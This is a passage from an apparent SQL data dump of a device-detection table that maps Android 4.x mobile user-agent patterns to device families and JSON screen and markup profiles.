Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DEXP Ixion ML2 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DEXP Ixion P 4\") AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DL900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DPF450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DROID RAZR HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_verizon','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DROID RAZR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_verizon','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Discovery Air) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Discovery Elite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Discovery) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Doppio SG351) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Doro Liberto 820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E2006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E2033) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E2053) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E2104) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E2105) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E2115) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E2124) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E380) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E380) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E435 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E4i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E6560L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; E6782) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ETL-S5042) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; EVOLVEO StrongPhone Q4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; EVOLVEO_StrongPhone_Q8_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Edison 3) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Energy Phone Pro HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; F-01F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; F-03G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; F-06F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; F5_15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; FLOW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; FS401) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; FS403) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; FS451) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; FS501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; FS551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; FX200,2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ431) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ440) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ4403) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ4404) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ4405_Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ4410 Quad) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ4490) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ450 Quattro) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly IQ451) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly_IQ442) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly_IQ444 Quattro) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fly_IQ446) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ForwardEndurance) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Fresh) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G526-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G526-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G526-L33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G620S-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G620S-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G620S-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G620S-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G620S-UL00) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G630-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G630-U10) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G630-U20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G630-U20) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G630-U251) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G7-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G735-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G735-L03) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; G735-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GETAWAY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GO400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GOA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GSmart Aku A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GSmart Arty A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GSmart Essence) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; GSmart Mika M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 